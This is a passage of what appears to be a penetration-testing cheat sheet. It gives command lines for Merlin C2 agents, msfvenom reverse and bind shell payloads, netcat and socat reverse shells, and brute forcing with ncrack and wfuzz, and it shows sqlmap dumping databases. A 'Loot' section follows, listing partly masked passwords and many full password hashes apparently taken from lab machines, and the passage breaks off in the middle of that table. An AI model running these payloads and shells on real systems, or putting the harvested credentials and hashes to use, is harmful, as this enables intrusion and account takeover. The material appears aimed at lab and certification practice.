https://github.com/PinkP4nther/Pinkit ``` ### merlin c2 framework [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>" -o merlinagentx64.exe main.go go build -o merlinagent.elf main.go ``` ### metasploit [🡑](#tools) ``` db_status load mimiktaz msfconsole -q msfdb init msfdb start search <string> set payload windows/x86/meterpreter/reverse_tcp set verbose true show advanced show options show payloads show targets systemctl start postgresql systemctl status postgresql wdigest ``` ### msfvenom [🡑](#tools) ``` linux bind tcp shellcode: msfvenom -p linux/x86/shell_bind_tcp lport=4444 -f c -b "\x00\x0a\x0d\x20" --platform linux -a x86 -e x86/shikata_ga_nai windows reverse tcp shellcode: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -b "\x00\x0a\x0d" -f c -a x86 --platform windows -e x86/shikata_ga_nai revere tcp shellcode for client-side exploit without any encoder: msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport> -f js_le --platform windows -a x86 -e generic/none php reverse meterpreter: msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f raw -o shell.php php reverse shell: msfvenom -p php/reverse_php LHOST=<targetip> LPORT=80 -f raw -o reverse.php java war reverse shell: msfvenom -p java/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war windows javascript reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -f js_le -e generic/none -n 18 windows powershell reverse shell: msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1 linux reverse tcp shell elf shared object file: msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport> -o linux-shell-reverse-tcp.so ``` ### netcat [🡑](#tools) ``` bind: nc -lvp <attackerport> connect: nc -nv <targetip> <attackerport> reverse: nc -e /bin/bash <targetip> <attackerport> ``` ### ncrack [🡑](#tools) ``` bruteforce rdp login: ncrack -vv --user administrator -P passwords.txt rdp://<targetip> ``` ### netdiscover [🡑](#tools) ``` netdiscover -r 192.168.92.0/24 ``` ### nikto [🡑](#tools) ``` nikto -h http://<targetip> nikto -C all -h http://IP nikto -h <targetip> -useproxy http://<targetip>:3128 ``` ### nmap [🡑](#tools) ``` vulners nse script: https://github.com/vulnersCom/nmap-vulners searchsploit-like vuln scan: nmap --script vulners --script-args mincvss=5.0 <targetip> ping sweep: nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap | grep Up | cut -d" " -f2 quick tcp: nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap <targetip> quick udp: nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip> full/intensive tcp: nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip> full/intensive udp: nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip> smb bruteforce: nmap --script=smb-brute.nse <targetip> nmap -sV -p 445 --script smb-brute <targetiprange> ``` ### openssl [🡑](#tools) ``` openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate valid for 7 days openssl req -new -key caca.key -out caca.csr ## create a new certificate signing request (csr) openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ## generate new certificate openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate pkcs12 certificate ``` ### searchsploit [🡑](#tools) ``` nmap service scan output -> searchsploit: nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml ``` ### socat [🡑](#tools) ``` socat file:`tty`,raw,echo=0 tcp-listen:<attackerport> socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport> ``` ### sqlmap [🡑](#tools) ``` avoid prompts, use defaults: sqlmap --batch read http request from a text file (request captured from burp, useful for POST requests) and use it to start scan: sqlmap -r searchform.txt --dbs --batch sqlmap -r searchform.txt -D webapphacking --dump-all --batch post requests: sqlmap -u "http://example.com/" --data "a=1&b=2&c=3" -p "a,b" --method POST intrusive scans: sqlmap --level 5 --risk 3 list databses: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" --dbs list tables within a database: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery --tables dump a table: sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos" -D gallery -T dev_accounts --dump blind sql enumeration: sqlmap -u "http://<targetip>:<targetport>/index.php" --forms --dbs ``` ### steghide [🡑](#tools) ``` steghide extract -sf file.jpg ``` ### unicornscan [🡑](#tools) ``` scan all 64k ports: unicornscan -vmT <targetip>:a scan first 1k ports: unicornscan -vmT <targetip>:p scan in udp mode: unicornscan -vmU <targetip> ``` ### wfuzz [🡑](#tools) ``` enumerate directories: wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://127.0.0.1/index.php?vuln=../FUZZ/file1.php" wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ wfuzz -w common.txt -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t 50 http://<targetip>:4488/FUZZ enumerate directories and filter on response length: wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hh 158607 http://bart.htb/FUZZ bruteforce password: bruteforce a single list: wfuzz -w pwds.db -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists: wfuzz -w pwds.db -w pins.txt -d "user=pinkadmin&pass=FUZZ&pin=FUZ2Z" -t 50 --hw 6 http://<targetip>:<targetport>/login.php bruteforce multiple lists, but faster: wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ' --hh 45,41 http://<targetip>:<targetport>/login.php ``` <a name="loot"></a> ## 🔥 Loot [↟](#contents) <a name="credentials"></a> ### 🔑 Credentials [🡑](#loot) | # | Username | Password | Type | |---|----------|----------|------| | 1. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ftp` | | 2. | `veronica` | `babygirl_veronica07@yah......` | `ftp` | | 3. | `eric` | `ericdoesntdrinkhiso.....` | `ftp` | | 4. | `Balrog` | `Mell..` | `ftp` | | 5. | `eezeepz` | `keKkeKKeKKeKkE....` | `http` | | 6. | `john` | `MyNameIsJ...` | `liggoat` | | 7. | `robert` | `ADGAdsafdfwt4gadf....` | `liggoat` | | 8. | `dreg` | `Mast..` | `lotuscms` | | 9. | `loneferret` | `starwa..` | `lotuscms` | | 10. | `admin` | `kEjdbRigfBHUREi....` | `mysql` | | 11. | `john` | `thiscannotb...` | `mysql` | | 12. | `wpdbuser` | `meErKa..` | `mysql` | | 13. | `mysql` | `mysql@12...` | `mysql` | | 14. | `admin` | `3298fj8323j80d....` | `mysql` | | 15. | `wordpress` | `Oscp1234..` | `mysql` | | 16. | `john` | `hiroshi..` | `mysql` | | 17. | `root` | `fuckey..` | `mysql` | | 18. | `Admin` | `TogieMYSQL123....` | `mysql` | | 19. | `root` | `darkshad..` | `mysql` | | 20. | `sql_svc` | `M3g4c0rp...` | `sql` | | 21. | `administrator` | `MEGACORP_4dm....` | `ssh` | | 22. | `notch` | `8YsqfCTnvxAUeduzjN.....` | `ssh` | | 23. | `pi` | `raspber..` | `ssh` | | 24. | `fox` | `12345..` | `ssh` | | 25. | `eric` | `triscui..` | `ssh` | | 26. | `anne` | `prince..` | `ssh` | | 27. | `graham` | `GSo7isUM...` | `ssh` | | 28. | `root` | `1234.` | `ssh` | | 29. | `admin` | `thisisalsopw...` | `ssh` | | 30. | `fristigod` | `LetThereBeFri....` | `ssh` | | 31. | `dreg` | `Mast..` | `ssh` | | 32. | `loneferret` | `starwa..` | `ssh` | | 33. | `john` | `MyNameIsJ...` | `ssh` | | 34. | `robert` | `ADGAdsafdfwt4gadf....` | `ssh` | | 35. | `togie` | `1234.` | `ssh` | | 36. | `bob` | `secr..` | `ssh` | | 37. | `susan` | `MySuperS3cretVa....` | `ssh` | | 38. | `insecurity` | `P@ssw0..` | `ssh` | | 39. | `smeagol` | `MyPreciousR...` | `ssh` | | 40. | `Ori` | `span..` | `ssh` | | 41. | `robot` | `abcdefghijklmnopqrstu.....` | `ssh` | | 42. | `mark` | `5AYRft73VtFp....` | `ssh` | | 43. | `wpadmin` | `wpadm..` | `ssh` | | 44. | `root` | `rootpasswo...` | `ssh` | | 45. | `user` | `letme..` | `ssh` | | 46. | `tomcat` | `submitthisforpo....` | `tomcat` | | 47. | | `execrab..` | `truecrypt` | | 48. | `rascal` | `lov.` | `webapp` | | 49. | `user1` | `hell.` | `webapp` | | 50. | `user2` | `comman..` | `webapp` | | 51. | `user3` | `p@ssw0..` | `webapp` | | 52. | `test` | `testte..` | `webapp` | | 53. | `superadmin` | `Uncracka...` | `webapp` | | 54. | `test1` | `testte..` | `webapp` | | 55. | `admin` | `5afac8d8..` | `webapp` | | 56. | `john` | `66lajGGb..` | `webapp` | | 57. | `frodo` | `iwilltakethe....` | `webapp` | | 58. | `smeagol` | `MyPreciousR...` | `webapp` | | 59. | `aragorn` | `AndMySwo..` | `webapp` | | 60. | `legolas` | `AndMyB..` | `webapp` | | 61. | `gimli` | `AndMyA..` | `webapp` | | 62. | `myP14ceAdm1nAcc0uNT` | `manchest..` | `webapp` | | 63. | `tom` | `spongeb..` | `webapp` | | 64. | `mark` | `snowfla..` | `webapp` | | 65. | `john` | `enig..` | `wordpress` | | 66. | `mark` | `helpdesk..` | `wordpress` | | 67. | | `admin:$P$Bx9ohXoCVR5lkKtuQbuWuh2........` | `wordpress` | | 68. | `admin` | `TogieMYSQL123....` | `wordpress` | | 69. | `elliot` | `ER28-06..` | `wordpress` | | 70. | `admin` | `admi.` | `wordpress` | <a name="hashes"></a> ### 🔑 Hashes [🡑](#loot) | # | Hash | |---|------| | 1. | `abatchy:$6$xEq/159Q$ScuKnynbwTBdFA4B9w6OqKxQpWPGpofi59McVuP6T1SADKhNy4n33Ovkk0hwZQkx72XriPSIrc2ubr16OEBBn0:17238:0:99999:7:::` | | 2. | `admin:$6$NPXhvENr$yG4a5RpaLpL5UDRRZ3Ts0eZadZfFFbYpI1kyNJp9rND0AySx2FhYSmAvY.91UzETJVvZcDjWb2pp85uLAli2J/:16757:0:99999:7:::` | | 3. | `Administrator:500:0a70918d669baeb307012642393148ab:34dec8a1db14cdde2a21967c3c997548:::` | | 4. | `Administrator:500:c74761604a24f0dfd0a9ba2c30e462cf:d6908f022af0373e9e21b8a241c86dca:::` | | 5. | `anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::` | | 6. | `anne:$6$ChsjoKyY$1uHlk7QUSOmdpvSP7Q4PYmE3evwQbUPFp27I4ZdRx/pZp8C8gJAQGu2vy8kwLakYA7cWuZ40aOl2u.8J94U7V.:17595:0:99999:7:::` | | 7. | `arrexel:$1$mDpVXKQV$o6HkBjhl/e.S.bV96tMm6.:17504:0:99999:7:::` | | 8. | `ASPNET:1007:3f71d62ec68a06a39721cb3f54f04a3b:edc0d5506804653f58964a2376bbd769:::` | | 9. | `Balrog:$6$J6kuCfxq$L5ALsHRYfOu0bVV9MbW3.VZOUVEaKSWhfPIq5wXUFV407tpvH8Zx7WdbJeXgdWoPo9LU8eIznf0d44qoFAMn3.:17284:0:99999:7:::` | | 10. | `billy:$6$eqJNxIDh$oO.ynkHZmLxfr0k8YXHHdbyB4boe2two4HnEiJzzuVEUh0w0paEtVCmHXziHhZIet71QcLqhqnV/iknE/pXdS1:17035:0:99999:7:::` | | 11. | `bitnamiftp:$6$saPiFTAH$7K09sg5oIfkIs5kuMx1R/Um4HNd8O6vF2n8oICEom8VVer0BYATY5wtzdPdP3JeuKbZ4RYBml0THNQv8TSc0s/:16751:0:99999:7:::` | | 12. | `bob:$6$Kk0DA.6Xha4nL2p5$jq7qoit2l4ckULg1ZxcbL5wUz2Ld2ZUa.RYaIMs.Lma0EFGheX9yCXfKy37K0GsHz50FYIqIESo4QXWL.DYTI0:17721:0:99999:7:::` | | 13. | `brexit:$6$51s7qYVw$XbTfXEV2acHRp9vmA7VTxO35OLK9EGZJzDGF9nYaukD3eppHsn2P1ESMr.9rRn/YYO70uiUskfkWP0LyRtTiT1:18048:0:99999:7:::` | | 14. | `crackmeforpoints:$6$p22wX4fD$RRAamkeGIA56pj4MpM7CbrKPhShVkZnNH2NjZ8JMUP6Y/1upG.54kSph/HSP1LFcn4.2C11cF0R7QmojBqNy5/:17104:0:99999:7:::` | | 15. | `doomguy:$6$DWqgg./v$NxqnujIjE8RI.y1u/xiFBPC0K/essEGOfxSF7ovfHG46K6pnetHZNON3sp19rGuoqo26wQkA4B2znRvhqCGQ11:17594:0:99999:7:::` | | 16. | `dreg:$1$qAc2saWZ$Y567sEs.ql3GMttI6pvoe0:15080:0:99999:7:::` | | 17. | `eezeepz:$6$djF4bN.s$JWhT7wJo37fgtuJ.be2Q62PnM/AogXuqGa.PgRzrMGv9/Th0aixBXl8Usy9.RkO1ZRAQ/UM3xP7oGWu9zgEIl.:16756:0:99999:7:::` | | 18. | `eric:$6$b15/PaMU$VKQussKbrXty79HD4A989SVCn.7.u6bJLMvsFgDSgiM01GlyM/lhb1xF0RcX906O6aIMbP7XoVI2F5UzII72i.:17033:0:99999:7:::` | | 19. | `fristigod:$6$0WqnZlI/$gIzMByP7rH21W3neA.uHYZZg5aM7gI1xtOj8WwgoK1QgQh2LWL0nQBJau/mGcOSxLbaGJhJjM.6HNJTWsaetf0:16758:0:99999:7:::` | | 20. | `graham:$6$WF7GkVxM$MOL.cXLpG6UTO0M4exCUFwOEiUhW6bwQa.Frg9CerQbTp.EW4QTzEAuio26Aylv.YP0JPAan10tsUFv6kyvRN0:18010:0:99999:7:::` | | 21. | `Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::` | | 22. | `hackme:$6$.L285vCy$Hma4mKjGV.sE7ZCFVj2iOkRokX1u3F5DMiTPQFoZPJnQ1kUXLje/bY2BIUQFbYu.8M6BvLML5fAftZOCEVnqa1:17981:0:99999:7:::` | | 23. | `harold:$1$7d.sVxgm$3MYWsHDv0F/LP.mjL9lp/1:14529:0:99999:7:::` | | 24. | `harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7:::` | | 25. | `Harry:1008:93c50499355883d1441208923e8628e6:031f5563e0ac4ba538e8ea325479740d:::` | | 26. | `IUSR_GRANPA:1003:a274b4532c9ca5cdf684351fab962e86:6a981cb5e038b2d8b713743a50d89c88:::` | | 27. | `IWAM_GRANPA:1004:95d112c4da2348b599183ac6b1d67840:a97f39734c21b3f6155ded7821d04d16:::` | | 28. | `jens:$6$JWiFWXb8$cGQi07IUqln/uLLVmmrU9VLg7apOH9IlxoyndELCGjLenxfAaVec5Gjaw2DA0QHRwS9hTB5cI2sg/Wk1OFoAh/:18011:0:99999:7:::` | | 29. | `john:$1$H.GRhlY6$sKlytDrwFEhu5dULXItWw/:15374:0:99999:7:::` | | 30. | `john:$1$wk7kHI5I$2kNTw6ncQQCecJ.5b8xTL1:14525:0:99999:7:::` | | 31. | `john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7:::` | | 32. | `john:$6$aoN7zaDl$e6RsRZndFekSS4bgqz0y5dgzO1dTQsMAWck6dFGogkxrrZf1ZyGbjy/oCpqJniIkasXP05iFZHs.XZVIQqZ2w1:17594:0:99999:7:::` | | 33. | `klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::` | | 34. | `Lakis:1009:f927b0679b3cc0e192410d9b0b40873c:3064b6fc432033870c6730228af7867c:::` | | 35. | `loneferret:$1$/x6RLO82$43aCgYCrK7p2KFwgYw9iU1:15375:0:99999:7:::` | | 36. | `loneferret:$1$qbkHf53U$r.kK/JgDLDcXGRC6xUfB11:15079:0:99999:7:::` | | 37. | `mai:$6$Mp.mBBi7$BCAKb75xSAy8PM6IhjdSOIlcmHvA9V4KnEDSTZAN2QdMUwCwGiwZtwGPXalF15xT097Q6zaXrY6nD/7RsdSiE0:17594:0:99999:7:::` | | 38. | `makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::` | | 39. | `mark:$6$//1vISW6$9pl2v8Jg0mNE7E2mgTQlTwZ1zcaepnDyYE4lIPJDdX7ipnxm/muPD7DraEm3z0jqDe5iH/Em2i6YXJpQD.5pl0:18010:0:99999:7:::` | | 40. | `mark:$6$J3gYK/cQ$au1WmOCtq.X1DTKt1CEmKA9qr4PfwZuAGUdCfAV.SSU5VxAtjW/Xk1/oWJtQVaoXMEVXmeBIB6bq24JpcSRjF0:17408:0:99999:7:::` | | 41. | `mysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG/IonKdnYEec0S0ZBcQFZ.sno/:18053:0:99999:7:::` | | 42. | `notch:$6$RdxVAN/.$DFugS5p/G9hTNY9htDWVGKte9n9r/nYYL.wVdAHfiHpnyN9dNftf5Nt.DkjrUs0PlYNcYZWhh0Vhl/5tl8WBG1:17349:0:99999:7:::` | | 43. | `noulis:$6$ApsLg5.I$Zd9blHPGRHAQOab94HKuQFtJ8m7ob8MFnX6WIIr0Aah6pW/aZ.yA3T1iU13lCSixrh6NG1.GHPl.QbjHSZmg7/:17247:0:99999:7:::` | | 44. | `Ori:$6$1zYgjEIM$VQ0gvU7JjenS9WuiVjSeva8pbWnEXjqTmEdFnQRXKmTmXPXmt55/oyup40NiXD8J9GxmXF7DYiaHZDRshrs3f1:17237:0:99999:7:::` | | 45. | `oscp:$6$k8OEgwaFdUqpVETQ$sKlBojI3IYunw8wEDAyoFdHgVtOPzkDPqksql7IWzpfZXpd3UqP569BokTZ52mDroq/rmJY9zgfeQVmBFu/Sf.:18452:0:99999:7:::` | | 46. | `peter:$6$QpjS4vUG$Zi1KcJ7cRB8TJG9A/x7GhQQvJ0RoYwG4Jxj/6R58SJddU2X/QTQKNJWzwiByeTELKeyp0vS83kPsYITbTTmlb0:17721:0:99999:7:::` | | 47. | `pi:$6$SQPHFoql$gSE5qWbZRGHDin4LnFY56sMnQsmvH/o2oIlXv.3KcqVsJCYgJ09R9/Pws88e8yjKgJnaxN3zdq8f5ots1bJcY/:17148:0:99999:7:::` | | 48. | `postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::` | | 49. | `puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::` | | 50. | `reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::` | | 51. | `robert:$1$rQRWeUha$ftBrgVvcHYfFFFk6Ut6cM1:15374:0:99999:7:::` | | 52. | `robot:$6$HmQCDKcM$mcINMrQFa0Qm7XaUaS5xLEBSeP3bUkr18iwgwTAL8AIfUDYBWG5L8J9.Ukb3gVWUQoYam4G0m.I5qaHBnTddK/:16752:0:99999:7:::` | | 53. | `root:$1$5GMEyqwV$x0b1nMsYFXvczN0yI0kBB.:15375:0:99999:7:::` | | 54. | `root:$1$DdHlo6rh$usiPcDoTR37eL7DAyLjhk1:0:0::0:0:Charlie &:/root:/bin/csh` | | 55. | `root:$1$FTpMLT88$VdzDQTTcksukSKMLRSVlc.:14529:0:99999:7:::` | | 56. | `root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::` | | 57. | `root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7:::` | | 58. | `root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7:::` | | 59. | `root:$6$.wvqHr9ixq/hDW8t$a/dHKimULfr5rJTDlS7uoUanuJB2YUUkh.LWSKF7kTNp4aL8UTlOk2wT8IkAgJ.vDF/ThSIOegsuclEgm9QfT1:18452:0:99999:7:::` | | 60. | `root:$6$9xQC1KOf$5cmONytt0VF/wi3Np3jZGRSVzpGj6sXxVHkyJLjV4edlBxTVmW91pcGwAViViSWcAS/.OF0iuvylU5IznY2Re.:16753:0:99999:7:::` | | 61. | `root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::` | | 62. | `root:$6$BVgS5ne0$Q6rV3guK7QQUy7uRMwbQ3vv2Y5I9yQUhIzvrIhuiDso/o5UfDxZw7MMq8atR3UdJjhpkFVxVD0cVtjXQdPUAH.:17431:0:99999:7:::` | | 63. | `root:$6$CM3c1cdI$HbQWZlQdGEWV8yo3j7M84i1/RFK4G7fafTUIUYLWk52zm9O8KRLhqZenF8KbqsUjHlZQk4VmNEeEbBCRjOWbH0:17111:0:99999:7:::` | | 64. | `root:$6$cQPCchYp$rWjOEHF47iuaGk/DQdkG6Dhhfm3.hTaNZPO4MoyBz2.bn44fERcQ23XCsp43LOt5NReEUjwDF8WDa5i1ML2jH.:16695:0:99999:7:::` | | 65. | `root:$6$GpmQGQUN$8kLewzMF4ItmxezcryWqSPrXNRTH5TOQFKKkHjK2NSmrTg95xiYi.l8L.RYUL.8pAsj8s4EGvDy4dvENQIqNf.:15585:0:99999:7:::` | | 66. | `root:$6$kdMFceEg$pk9h93tdD7IomhE7L0Y396HO6fxSM.XDh9dgeBhKpdZlM/WYxCZe7yPRNHfZ5FvNRuILVp2NOsqNmgjoSx/IN0:18012:0:99999:7:::` | | 67. | `root:$6$L2m6DJwN$p/xas4tCNp19sda4q2ZzGC82Ix7GiEb7xvCbzWCsFHs/eR82G4/YOnni/.L69tpCkOGo5lm0AU7zh9lP5fL6A0:17247:0:99999:7:::` | | 68. | `root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::` | | 69. | `root:$6$mqjgcFoM$X/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::` | | 70. | `root:$6$n.BA4A59$WeIF0ZbaB3VGgAxUZqGHnw01.GhL9oVYYFioh07RpPtBl49YdMahhtbYhxUjanXf/NJXiCHBvrNhdC53P1UX2.:17412:0:99999:7:::` | | 71. | `root:$6$O4bZf1Ju$0xcLPNyQkVcKT0CajZYBOTz4thlujMRjQ7XuFstUDWwYHKmVmJsDmzGXUwYbU1uqr6jxEvX4XJjSUgiwjPmEp0:17399:0:99999:7:::` | | 72. | `root:$6$P7ElNgGp$fNzyy4OgqSR1ANJXTgbpzp4U42JXG1qJ55iNV10NVJoX5UWjtckWD0oHmcTOj0lqObyWhFu2y3udHVpHaqYxf.:17238:0:99999:7:::` | | 73. | `root:$6$PnbVvEMS$OcseJT8lZRrgrW1JBpHJ252SPRxS6Rkh3oVBkrbRBZgHBD1wArL6FcyO5daqaon7waFKwSqbg5fIjFgzUVFMS1:18048:0:99999:7:::` | | 74. | `root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::` | | 75. | `root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::` | | 76. | `sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::` | | 77. | `scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::` | | 78. | `service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::` | | 79. | `setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::` | | 80. | `shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::` | | 81. | `smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::` | | 82. | `SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::` | | 83. | `susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::` | | 84. | `sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::` | | 85. | `togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::` | | 86. | `tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::` | | 87. | `user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::` | | 88. | `user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::` | | 89. | `user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::` | | 90. | `user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::` | | 91. | `user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::` | | 92. | `user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::` | | 93. | `user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::` | | 94. | `user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::` | | 95. | `user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::` | | 96. | `veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::` | | 97. | `vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::` | | 98. | `wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::` | | 99. | 